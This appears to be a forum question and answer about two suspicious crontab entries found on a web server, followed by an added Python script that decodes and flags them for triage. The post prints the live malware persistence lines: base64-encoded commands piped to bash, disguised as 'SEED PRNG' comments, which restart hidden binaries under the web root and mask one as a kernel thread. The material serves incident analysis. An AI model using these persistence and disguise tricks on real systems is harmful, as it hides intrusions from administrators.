I found 2 strings in the cron scheduler:
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9IFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1trYWx1YWRdJyAnL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdCciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# DO NOT REMOVE THIS LINE. SEED PRNG. #core-kernel
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGNvcmUgMj4vZGV2L251bGwgfHwgJy92YXIvd3d3L3d3dy1yb290L2RhdGEvLmNvbmZpZy9odG9wL2NvcmUnIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng core-kernel
The base64-decoded substrings are:
/usr/bin/pkill -0 -U1010 defunct 2>/dev/null || SHELL= TERM=xterm-256color GS_ARGS="-k /var/www/www-root/data/.config/htop/defunct.dat -liqD" /usr/bin/bash -c "exec -a '[kaluad]' '/var/www/www-root/data/.config/htop/defunct'" 2>/dev/null
/usr/bin/pkill -0 -U1010 core 2>/dev/null || '/var/www/www-root/data/.config/htop/core' 2>/dev/null
Can you explain what these commands do?
They keep trying to start the programs /var/www/www-root/data/.config/htop/core and /var/www/www-root/data/.config/htop/defunct if those programs are not already running (pkill with signal 0 is used to test whether a process is already running). The former also uses exec to disguise the process name as "[kaluad]" (making it look like a kernel thread). Both look like fairly standard "your web server is infected with a cryptocurrency miner, and who knows what else" cron jobs.
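To triage entries like these without running them, a small script that pulls the `echo <base64>|base64 -d|bash` payload out of each crontab line, decodes it, and flags the indicators the answer describes (the `pkill -0` liveness check, the `exec -a` process-name disguise, and binaries living in a dot-directory under the web root). This is an added example, not code from the question or the answer; the crontab lines are copied from the question above, and the regular expressions are assumptions about how that decode-and-run idiom is written.

```python
import base64
import re

# Sample input: the two crontab entries quoted in the question above.
CRON_LINES = [
    "0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgU0hFTEw9IFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdC5kYXQgLWxpcUQiIC91c3IvYmluL2Jhc2ggLWMgImV4ZWMgLWEgJ1trYWx1YWRdJyAnL3Zhci93d3cvd3d3LXJvb3QvZGF0YS8uY29uZmlnL2h0b3AvZGVmdW5jdCciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel",
    "0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDEwIGNvcmUgMj4vZGV2L251bGwgfHwgJy92YXIvd3d3L3d3dy1yb290L2RhdGEvLmNvbmZpZy9odG9wL2NvcmUnIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng core-kernel",
]

# "echo <base64> | base64 -d | bash": the decode-and-run idiom used by both entries (assumed shape).
B64_RUN = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh")
# exec -a '<name>' sets argv[0], which is what ps and top show as the process name.
EXEC_A = re.compile(r"exec\s+-a\s+'([^']*)'")
# pkill -0 <pattern> only tests whether a matching process exists; signal 0 is never delivered.
LIVENESS = re.compile(r"pkill\s+-0\b")
# Paths under the web root; here the binaries sit in a hidden .config/htop directory.
WEBROOT_PATH = re.compile(r"/var/www/[^\s'\"]+")


def decode_payloads(lines):
    """Return one finding per decode-and-run crontab entry, without executing anything."""
    findings = []
    for line in lines:
        for m in B64_RUN.finditer(line):
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace").strip()
            findings.append({
                "schedule": " ".join(line.split()[:5]),       # the five cron time fields
                "decoded": decoded,                            # the command cron really runs
                "liveness_check": bool(LIVENESS.search(decoded)),
                "fake_name": EXEC_A.findall(decoded),          # names the process is disguised as
                "paths": WEBROOT_PATH.findall(decoded),        # files to preserve for forensics
            })
    return findings


if __name__ == "__main__":
    for f in decode_payloads(CRON_LINES):
        print(f"[{f['schedule']}] liveness_check={f['liveness_check']} fake_name={f['fake_name']}")
        for p in f["paths"]:
            print("  path:", p)
        print("  runs:", f["decoded"])
```

Run it against the output of `crontab -l -u <user>` for each account on the box; the `paths` list is what to copy off for analysis before cleaning up.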